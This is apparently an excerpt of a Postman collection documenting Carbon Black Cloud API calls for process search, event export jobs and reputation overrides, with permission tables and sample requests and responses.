(CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","report_hits"],"host":["{{cb_url}}"],"query":[{"description":{"content":"<p>REQUIRED: Process GUID for which to get report hits</p>\n","type":"text/plain"},"key":"process_guid","value":""},{"disabled":true,"description":{"content":"<p>Number of report hits to get</p>\n","type":"text/plain"},"key":"rows","value":"10"}],"variable":[]}},"response":[],"_postman_id":"0785b8b5-919f-4483-81ae-e7bea97ce007"}],"id":"1f353bad-dc02-465d-8932-653739d8a4c0","_postman_id":"1f353bad-dc02-465d-8932-653739d8a4c0","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Deprecated","item":[{"name":"⚠️ Get the Status of a Process Search (v1)","id":"4b82fcfa-aedb-46ff-89fa-ee4e2f3ca7bc","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/search_jobs/{{cb_job_id}}","description":"<p>Returns the status of a search job. A job is finished when “completed” is equal to the “contacted”. This call should be used when polling for search job completion as it is more efficient than fetching results each time.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-the-status-of-a-process-search-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","search_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"4b82fcfa-aedb-46ff-89fa-ee4e2f3ca7bc"},{"name":"⚠️ Get the Status of a Process Detail Search (v2)","id":"65a154e3-bc1b-4b0f-96e3-f03ec0eaea35","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/detail_jobs/{{cb_job_id}}","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Retrieves the status for a process detail request for a given job_id. Continue to call the status check until “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-the-status-of-a-process-detail-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","detail_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"65a154e3-bc1b-4b0f-96e3-f03ec0eaea35"},{"name":"⚠️ Get the Status of Process Summary Search (v2)","id":"41862ae5-20d7-473e-811b-b49b8f273f14","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v2/orgs/{{cb_org_key}}/processes/summary_jobs/{{cb_job_id}}","description":"<p><em>Note: This call is for <strong>preview only</strong> and may be subject to unannounced updates.</em></p>\n<p>Retrieves the status for a process summary request for a given job_id. Continue to call the status check until “contacted” equals “completed”.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#get-the-status-of-process-summary-search-v2\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v2","orgs","{{cb_org_key}}","processes","summary_jobs","{{cb_job_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"41862ae5-20d7-473e-811b-b49b8f273f14"},{"name":"Process Search Validation (v1)","id":"305bdf7d-cb6a-4675-88bd-f9b26703a057","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/search_validation?q=chrome","description":"<p>Validates a given process query and potentially gives suggestions on how to fix invalid queries.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#process-search-validation-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","search_validation"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Start time for the query</p>\n","type":"text/plain"},"key":"cb.min_backend_timestamp","value":""},{"disabled":true,"description":{"content":"<p>End time for the query</p>\n","type":"text/plain"},"key":"cb.max_backend_timestamp","value":""},{"key":"q","value":"chrome"}],"variable":[]}},"response":[],"_postman_id":"305bdf7d-cb6a-4675-88bd-f9b26703a057"},{"name":"Process Search Suggestions (v1)","id":"ee8bbdff-508f-474a-9ca8-2171539adf86","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"url":"{{cb_url}}/api/investigate/v1/orgs/{{cb_org_key}}/processes/search_suggestions?suggest.q=process_cmd","description":"<p>Returns suggestions for a process search selected from fields and values as reported in the organization’s system. Will return values for the specified field if at least one character follows the colon. Returns null if no characters follow the colon.</p>\n<h3 id=\"rbac-permissions-required\">RBAC PERMISSIONS REQUIRED</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.search.events</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#process-search-suggestions-v1\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["api","investigate","v1","orgs","{{cb_org_key}}","processes","search_suggestions"],"host":["{{cb_url}}"],"query":[{"disabled":true,"description":{"content":"<p>Number of suggestions to return\nDefault: 50</p>\n","type":"text/plain"},"key":"suggest.count","value":"50"},{"key":"suggest.q","value":"process_cmd"}],"variable":[]}},"response":[],"_postman_id":"ee8bbdff-508f-474a-9ca8-2171539adf86"}],"id":"72ab0fb5-5388-4e4a-8143-dfc4e90a7252","_postman_id":"72ab0fb5-5388-4e4a-8143-dfc4e90a7252","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Export Process Search Results with Jobs Service","id":"0fa4ba45-c3f6-4ec6-b620-af453025689b","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"PROCESSES\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>This is a specific example for exporting Processes which uses the generic Jobs Service. The sequence to use the jobs services is</p>\n<ol>\n<li>Start an Export Event Job (this call)</li>\n<li>Check the job has completed with Get Job Progress</li>\n<li>Download the Job Output. The response is a zipped csv file of results.</li>\n</ol>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Full documentation is available on the <a href=\"https://developer.carbonblack.com/\">Developer Network</a></p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#calls-for-processes\">Processes Search API</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"16e8ab15-a235-43ca-90ed-29b46ed40206","name":"Export Process Search Results with Jobs Service","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"PROCESSES\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":null,"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5731487,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"PROCESSES\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T03:19:56.752Z\",\n    \"last_update_time\": \"2023-03-29T03:19:56.753Z\"\n}"}],"_postman_id":"0fa4ba45-c3f6-4ec6-b620-af453025689b"},{"name":"Export Process Events Search Results with Jobs Service","id":"d6168668-35fd-41b4-b080-1e739c5458c5","protocolProfileBehavior":{"disableBodyPruning":true,"disabledSystemHeaders":{}},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"PROCESS_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export","description":"<p>This is a specific example for exporting Process Events which uses the generic Jobs Service. The sequence to use the jobs services is</p>\n<ol>\n<li>Start an Export Event Job (this call)</li>\n<li>Check the job has completed with Get Job Progress</li>\n<li>Download the Job Output. The response is a zipped csv file of results.</li>\n</ol>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>jobs.status</td>\n<td>READ</td>\n</tr>\n<tr>\n<td>org.search.events</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p>Full documentation is available on the <a href=\"https://developer.carbonblack.com/\">Developer Network</a></p>\n<ul>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/job-service-api/\">Job Service API</a></li>\n<li><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/platform-search-api-processes/#calls-for-processes\">Processes Search API</a></li>\n</ul>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}},"urlObject":{"path":["jobs","v1","orgs","{{cb_org_key}}","jobs","start","event_export"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"ff2433a0-6175-473e-b558-c88f725ccd28","name":"Export Process Events Search Results with Jobs Service","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"api_resource\": \"PROCESS_EVENTS\",\n    \"version\": \"v2\",\n    \"query\": {\n        \"criteria\": {},\n        \"exclusions\": {},\n        \"query\": \"*:*\",\n        \"time_range\": {\n            \"start\": \"2023-03-26T02:00:00.000Z\",\n            \"end\": \"2023-03-29T02:06:20.864Z\"\n        },\n        \"rows\": 10000,\n        \"fields\": [\n            \"*\"\n        ],\n        \"sort\": [\n            {\n                \"field\": \"device_timestamp\",\n                \"order\": \"DESC\"\n            }\n        ]\n    }\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/jobs/v1/orgs/{{cb_org_key}}/jobs/start/event_export"},"status":"Created","code":201,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Wed, 29 Mar 2023 16:20:59 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"531"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Set-Cookie","value":"JSESSIONID=D46AE325BB077DEC04219070538F29BF; Path=/jobs; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"id\": 5742539,\n    \"type\": \"event_export\",\n    \"job_parameters\": {\n        \"job_parameters\": {\n            \"query\": {\n                \"criteria\": {},\n                \"exclusions\": {},\n                \"query\": \"*:*\",\n                \"time_range\": {\n                    \"start\": \"2023-03-26T02:00:00.000Z\",\n                    \"end\": \"2023-03-29T02:06:20.864Z\"\n                },\n                \"rows\": 10000,\n                \"fields\": [\n                    \"*\"\n                ],\n                \"sort\": [\n                    {\n                        \"field\": \"device_timestamp\",\n                        \"order\": \"DESC\"\n                    }\n                ]\n            }\n        },\n        \"process_guid\": null,\n        \"api_resource\": \"PROCESS_EVENTS\",\n        \"version\": \"v2\",\n        \"search_id\": null\n    },\n    \"connector_id\": \"12345ABCD\",\n    \"org_key\": \"ABCD1234\",\n    \"status\": \"CREATED\",\n    \"create_time\": \"2023-03-29T16:20:59.013Z\",\n    \"last_update_time\": \"2023-03-29T16:20:59.014Z\"\n}"}],"_postman_id":"d6168668-35fd-41b4-b080-1e739c5458c5"}],"id":"6e1907a1-acbc-4b0d-994b-b8e31a856f16","_postman_id":"6e1907a1-acbc-4b0d-994b-b8e31a856f16","description":"","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","id":"ac866782-e63b-44f3-8fec-94cd4fb9d7a1","name":"Carbon Black Cloud (CBC)","type":"folder"}}},{"name":"Reputation Override API 🗝","item":[{"name":"Configure Reputation Override","id":"3923ac54-52af-4c3d-a943-2a6f87688595","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"description\": \"<string>\",\n  \"override_list\": \"<string>\",\n  \"override_type\": \"<string>\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides","description":"<p>Configure a new reputation override for a SHA-256, cert or IT tool</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>CREATE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#configure-reputation-override\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"20e41f55-3d56-45d0-af1c-6660107606bb","name":"Configure Reputation Override by SHA256","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n    \"description\": \"This file was found to be malicous.\",\n    \"override_list\": \"BLACK_LIST\",\n    \"override_type\": \"SHA256\",\n    \"sha256_hash\": \"af62e6b3d475879c4234fe7bd8ba67ff6544ce6510131a069aaac75aa92aee7a\",\n    \"filename\": \"foo.exe\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides"},"_postman_previewlanguage":"Text","header":[],"cookie":[],"responseTime":null,"body":""}],"_postman_id":"3923ac54-52af-4c3d-a943-2a6f87688595"},{"name":"Get Reputation Override","id":"1d488f79-ecaa-443c-94b6-fc5fb41a3176","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/{{cb_reputation_id}}","description":"<p>Retrieve a reputation override by id</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#get-reputation-override\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides","{{cb_reputation_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"1d488f79-ecaa-443c-94b6-fc5fb41a3176"},{"name":"Delete Reputation Override","id":"a8b196da-1351-4b58-aea3-728649c35845","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"DELETE","header":[],"body":{"mode":"raw","raw":"","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/{{cb_reputation_id}}","description":"<p>Delete a reputation override by id</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>DELETE</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#delete-reputation-override\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides","{{cb_reputation_id}}"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[],"_postman_id":"a8b196da-1351-4b58-aea3-728649c35845"},{"name":"Search Reputation Overrides","id":"1259ae23-0f38-435c-bcdb-577f679fdd50","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n  {\n    \"query\": \"<string>\",\n    \"criteria\": {\n      \"override_list\": \"<string>\",\n      \"override_type\": \"<string>\"\n    },\n    \"start\": <integer>,\n    \"rows\": <integer>,\n    \"sort_field\": \"<string>\",\n    \"sort_order\": \"<string>\"\n  }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/_search","description":"<p>Search existing reputation overrides by a search criteria</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#search-reputation-overrides\">See Documentation</a></p>\n","auth":{"type":"apikey","apikey":{"basicConfig":[{"key":"key","value":"X-Auth-Token"},{"key":"value","value":"{{cb_custom_key}}/{{cb_custom_id}}"}]},"isInherited":true,"source":{"_postman_id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","id":"b5a987e2-64a5-4e4c-92e2-09a88d25aa1e","name":"Reputation Override API 🗝","type":"folder"}},"urlObject":{"path":["appservices","v6","orgs","{{cb_org_key}}","reputations","overrides","_search"],"host":["{{cb_url}}"],"query":[],"variable":[]}},"response":[{"id":"324f5c8a-bb2d-43bc-bc2a-ecf3c322911f","name":"Search Reputation Overrides by SHA256","originalRequest":{"method":"POST","header":[],"body":{"mode":"raw","raw":"{\n  \"query\": \"dd1933c7e15f4940d2e147b96aef40b9ffd8ba65cfa331cb1f9ca0a4770988f7\",\n  \"sort_field\": \"create_time\",\n  \"sort_order\": \"asc\"\n}","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/_search"},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[{"key":"Date","value":"Tue, 11 May 2021 03:32:04 GMT"},{"key":"Content-Type","value":"application/json"},{"key":"Content-Length","value":"373"},{"key":"Connection","value":"keep-alive"},{"key":"Cache-Control","value":"no-cache, no-store, max-age=0, must-revalidate"},{"key":"Expires","value":"0"},{"key":"Pragma","value":"no-cache"},{"key":"Server","value":"Apache-Coyote/1.1"},{"key":"Set-Cookie","value":"JSESSIONID=A52761A1998AA8EE59DBE380A2DEC782; Path=/appservices; HttpOnly"},{"key":"X-Content-Type-Options","value":"nosniff"},{"key":"X-Frame-Options","value":"DENY"},{"key":"X-Xss-Protection","value":"1; mode=block"}],"cookie":[],"responseTime":null,"body":"{\n    \"num_found\": 1,\n    \"results\": [\n        {\n            \"id\": \"529b1c8aada811ebb0e0015d9b3efa1c\",\n            \"created_by\": \"gsliwka@confluera.com\",\n            \"create_time\": \"2021-05-05T13:46:41.694Z\",\n            \"override_list\": \"WHITE_LIST\",\n            \"override_type\": \"SHA256\",\n            \"description\": \"Confluera tool\",\n            \"source\": \"APP\",\n            \"source_ref\": null,\n            \"sha256_hash\": \"dd1933c7e15f4940d2e147b96aef40b9ffd8ba65cfa331cb1f9ca0a4770988f7\",\n            \"filename\": \"getshell8.exe\"\n        }\n    ]\n}"}],"_postman_id":"1259ae23-0f38-435c-bcdb-577f679fdd50"},{"name":"Export Reputation Overrides","id":"99e7af9f-367f-4c18-94af-3e3454751b23","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"POST","header":[],"body":{"mode":"raw","raw":"[\n  {\n    \"query\": \"<string>\",\n    \"criteria\": {\n      \"override_list\": \"<string>\",\n      \"override_type\": \"<string>\"\n    },\n    \"start\": <integer>,\n    \"rows\": <integer>,\n    \"sort_field\": \"<string>\",\n    \"sort_order\": \"<string>\"\n  }\n]","options":{"raw":{"language":"json"}}},"url":"{{cb_url}}/appservices/v6/orgs/{{cb_org_key}}/reputations/overrides/_export","description":"<p>Export existing reputation overrides by a search criteria</p>\n<h3 id=\"rbac-permissions-required\">RBAC Permissions Required</h3>\n<div class=\"click-to-expand-wrapper is-table-wrapper\"><table>\n<thead>\n<tr>\n<th>Permission (.notation name)</th>\n<th>Operation(s)</th>\n</tr>\n</thead>\n<tbody>\n<tr>\n<td>org.reputations</td>\n<td>READ</td>\n</tr>\n</tbody>\n</table>\n</div><p><a href=\"https://developer.carbonblack.com/reference/carbon-black-cloud/platform/latest/reputation-override-api/#export-reputation-overrides\">See 